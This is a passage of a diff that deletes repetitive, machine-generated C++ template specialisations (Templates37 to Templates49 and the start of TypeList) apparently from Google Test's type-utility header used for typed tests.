-      T28, T29, T30, T31, T32, T33, T34, T35, T36> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates37<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates38<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates39<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates40<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates41<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates42<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates43<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates44<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    T45, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates45<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44, T45> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    T45, T46, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates46<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44, T45, T46> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    T45, T46, T47, NoneT, NoneT, NoneT> {
-  typedef Templates47<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44, T45, T46, T47> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47, GTEST_TEMPLATE_ T48>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    T45, T46, T47, T48, NoneT, NoneT> {
-  typedef Templates48<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44, T45, T46, T47, T48> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47, GTEST_TEMPLATE_ T48,
-    GTEST_TEMPLATE_ T49>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    T45, T46, T47, T48, T49, NoneT> {
-  typedef Templates49<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44, T45, T46, T47, T48, T49> type;
-};
-
-// The TypeList template makes it possible to use either a single type
-// or a Types<...> list in TYPED_TEST_CASE() and
-// INSTANTIATE_TYPED_TEST_CASE_P().
-
-template <typename T>
-struct TypeList {
-  typedef Types1<T> type;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49, typename T50>
-struct TypeList<Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
